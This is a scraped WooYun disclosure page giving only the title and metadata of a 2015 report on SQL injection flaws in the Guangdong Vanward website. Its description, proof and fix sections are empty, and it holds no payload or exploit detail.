漏洞标题：广东万和新电气官网多处SQL注射（DBA权限+泄露用户信息+燃气套餐+各种反馈信息）

相关厂商：广东省信息安全测评中心

漏洞作者： 路人甲

提交时间：2015-11-11 10:34

修复时间：2015-12-26 15:02

公开时间：2015-12-26 15:02

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(广东省信息安全测评中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0153482"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云